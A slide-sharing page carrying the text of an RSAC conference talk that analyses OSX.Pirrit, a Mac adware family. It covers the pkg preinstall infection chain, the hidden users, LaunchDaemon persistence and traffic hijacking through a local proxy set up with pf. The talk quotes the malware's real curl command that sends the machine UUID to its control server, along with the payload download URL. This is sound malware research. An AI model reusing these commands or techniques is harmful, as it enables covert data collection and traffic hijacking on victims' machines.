Cloud Security: Limitations of Cloud Security Groups and Flow Logs
 
Cyber Security Governance
Cyber Security GovernanceCyber Security Governance
Cyber Security Governance
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 

Recently uploaded

Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentationphoebematthew05
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Mark Simos
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 

Recently uploaded (20)

Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
costume and set research powerpoint presentation
costume and set research powerpoint presentationcostume and set research powerpoint presentation
costume and set research powerpoint presentation
 
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
Tampa BSides - Chef's Tour of Microsoft Security Adoption Framework (SAF)
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 

OSX Pirrit : Why you should care about malicious mac adware

  • 1. #RSAC OSX Pirrit: Why You Should Care About Malicious Mac Adware Amit Serper Principal security researcher, Cybereason,
  • 3. #RSAC $ whoami 3 • Amit Serper (What’s with the weird name, dude?) • Principal security researcher @ Cybereason Low level research (Kernel, reversing, etc...) Writing poorly programmed attack simulation tools (crappy coder) Malware research HackingTeam server research (with @awfrazer): Slides: http://hackedteam.lol Paper: http://ht-paper.amit.wtf Blogs: http://ht1.amit.wtf, http://ht2.amit.wtf Lead security researcher @ Israeli government agency (9 years) <REDACTED> Follow me on twitter: @0xAmit
  • 4. #RSAC $ cat /Users/amit/agenda.txt 4 1. For those that weren’t around 15 years ago: Intro to adware 2. This apple is getting ripe: Adware on Mac 3. OSX.Pirrit 4. How they messed up
  • 5. #RSAC Intro to Adware 5 • Adware usually gets to your machine with installers. • These installers install a program that you downloaded and then offer you to add some other program that will enhance your expirience
  • 6. #RSAC Intro to Adware 6 1. Software that resides on one’s machine and displays ads 2. Adware divide into several categories: • Plain and stupid – Just displays popups without any context • The “norm” – Displays banners (and rarely popups) according to basic metrics that are gathered from the browser • The black-ops operative – Installs a hidden program that can see your entire traffic, injects ads to pages you visit and even over-rides legitimate ads that were put there in the first place (That’s stealing!)
  • 7. #RSAC Adware on the Mac 7 1. Similar to windows, adware to OS X comes usually in the form of toolbars 2. These toolbars are safari plugins – like Spigot…
  • 8. #RSAC Adware on the Mac 8 1. Similar to windows, adware to OS X comes usually in the form of toolbars 2. These toolbars are safari plugins – like Spigot… 3. Spigot also installs LaunchAgents! http://www.thesafemac.com/arg-spigot
  • 9. #RSAC The story begins… 9 • An irc user “Xiano” popped in to #osxre @ freenode and told us that his friend’s mac is acting weird • He said that internet browsing is rather slow and some weird processes are showing up. • He then shared with us a weird executable called “sizzling”. • Another channel member, “Paraxor” started reversing that executable and quoted some function names • It was immediately clear that this is some sort of adware because of these strings
  • 11. #RSAC Qt? • Qt (pronounced cute) is a cross-platform application development framework • Allows a developer to maintain a single codebase for an application that will run on Windows, Linux, Mac and other platforms… • The ”cost” of that are a lot of external libraries that are linked with your application
  • 12. #RSAC The story begins… (continued) http://forums.macrumors.com/threads/what-is-unillumination-process-mavericks.1966015/
  • 13. #RSAC
  • 14. #RSAC
  • 15. #RSAC
  • 16. #RSAC Let’s look at the binary (strings table)
  • 17. #RSAC Another URL in the strings table
  • 18. #RSAC Let’s google that url… http://shorte.st/st/2904deaf2db062b776f39f499bf88ad9/%1 Gives 1 result to a JoeSandbox analysis of a Windows PE executable
  • 19. #RSAC Shorte.st – URL shortening service
  • 21. #RSAC Let’s look at the script – rec_script.sh
  • 23. #RSAC But removal instructions for mac? What is… “No”.
  • 24. #RSAC Xiano was back with more… • He found an app bundle called “DemoUpdater” on his friend’s machine. • He mentioned that this app bundle was running under a different user which he did not know. • Inside the app bundle was a x64 Mach-O binary executable and a shell script called Update2.sh. • This was far more interesting.
  • 25. #RSAC In the executable - Suspicious functions and strings galore!
  • 27. #RSAC And also… Some more windows crap
  • 28. #RSAC But what about that update2 shell script? • When the executable finishes running, it executes Update2.sh • It’s a HUGE script (330 lines) – it even has some inline python code (python –c) Gets the machine uuid via command line (ioreg, parses its huge output with awk and grep) Sends the machine ID to a server in order to get a new ID back from the server by issuing a curl command: curl "http://93a555685cc7443a8e1034efa1f18924.com/v/cld?mid=<UUID>&ct=pd" It validates your geolocation by curl’ing ipinfo.io/country and checks that you are from US, UK, Spain, Australia, France, Germany, India, Italy, Netherlands or New Zealand in order to download a different “ad package”. It’s updating the C&C and telling it that the installation was successful, it uses the uuid as an identifier. After the C&C was notified, the script will download and install another program called “DemoInjector”
  • 29. #RSAC So here’s what we know until now • It’s an adware • It generates traffic • It’s cross-platform • It’s definitely trying to hide strings and domains inside the binary • It adds a hidden user with a weird name – it has to get root access • It runs weird processes with strange names • It has a componenet called “DemoUpdater”
  • 30. #RSAC But here’s what no one knows How the hell did people get infected?!
  • 33. #RSAC • Mac equivalent of the MSI (Installer file) • An extensible archive format (XAR) • Has a nice wizard with useful EULA messages • Can be signed with a developer certificate • Has the ability to run pre/post install scripts! PKG file?
  • 34. #RSAC • Pkg files are a very convenient way to drop malware • You can codesign them • And you can just use the scripting features to do whatever you want to. PKG file!
  • 35. #RSAC PKG file – Suspicious package http://www.mothersruin.com/software/SuspiciousPackage/
  • 36. #RSAC PKG file – Suspicious package
  • 37. #RSAC Let’s Look at this Script
  • 38. #RSAC Entire Process User downloads crack Gets pkg Pre install script runs Script downlodas “DemoUpdater” component DemoUpdater prepares the infrastructure for DemoInjector Profit!
  • 39. #RSAC DemoUpdater • DemoUpdater is the first component that’s actually being installed by Pirrit. • This is the component that lays the groundwork for the traffic hijacking proxy • This is the script that generates the strange names • After a random name was generated, it is being written to com.common.plist • It then creates another plist to hold its preferences. That plist is created with a random name on each install (com.<RANDOMWORD>.preferences.plist)
  • 40. #RSAC DemoUpdater • The script then carries on with creating the DemoUpdater bundle and executable while not forgetting to change its name to make detection harder • It then downloads the next component, DemoInjector and adding a LaunchDaemon for it.
  • 41. #RSAC Wait… LaunchDaemons? • A LaunchDaemon is an autorun in Mac speak • It loads when the computer boots • And just like everything in OS X, it’s also stored in a plist file
  • 42. #RSAC The soil is ready… Now – plant the seed • After all of the basic building blocks were layed, it is time for the main event • We have a random name generated for DemoUpdater • We have an autorun set up for DemoUpdater • Now it’s time to get the proxy and get crackin’! • The proxy is DemoInjector (remember it from before?) • It will be downloaded from: "http://93a555685cc7443a8e1034efa1f18924.com/static/pd_files/dit3.tgz • The number in the tgz file is incremental – different version • The latest version of DemoInjector is dit8 and it is from April 10th 2016.
  • 43. #RSAC The soil is ready… Now – plant the seed • The proxy is called DemoInjector. • It is also a QT project. • It also has a lot of shell scripts! • The most interesting one is install_injector.sh • It also generates a random company name and executable name • And it creates a hidden user!
  • 46. #RSAC Someone was reading Apple documentation  https://support.apple.com/en-il/HT203998
  • 47. #RSAC Someone was reading Apple documentation 
  • 48. #RSAC Another LaunchDaemon, this time for DemoInjector
  • 49. #RSAC And now – Traffic redirection! • DemoInjector is listening on 127.0.0.1:9882 • All of the packets that are generated by everyone but $HIDDEN_USERS are forwarded to DemoInjector using pf • These settings also exist in another file that is dropped by the installer, called /etc/change_net_settings. There’s also a LaunchDaemon for that!
  • 52. #RSAC Uncovering the perpetrators • Like all good things… It happened totally by accident! • I just got a fresh sample of another OSX/Pirrit installer • As I was too lazy to disable the AV inside my OSX vm, I decided that I should just list the files inside the archive
  • 54. #RSAC A quick LinkedIn search for the name…
  • 55. #RSAC TargetingEdge? Boy… Their product sounds just like Pirrit!
  • 56. #RSAC Buzz is created! • About 40 different papers/news site cover OSX/pirrit • Including: ThreatPost, Ars Technica, SC Magazine and more… • All of them asked for TargetingEdge’s response. • None got it. But one.
  • 57. #RSAC Calcalist – Isreal’s ‘The Economist’ TargetingEdge’s response (translated from Hebrew): “We’ve read Cybereason’s highly inaccurate PR report. Among many wrong details that are weaved all across their report, it is important to note that the code featured in CR’s report does not belong to TargetingEdge but to an Eastern European company…” Now, who do YOU believe?
  • 58. #RSAC P.S – this is awesome… Exhibit B - CV
  • 60. #RSAC Thanks! • PATRICK WARDLE / OBJECTIVE-SEE.COM / @PATRICKWARDLE • My pals from Cybereason for the moral support YOU!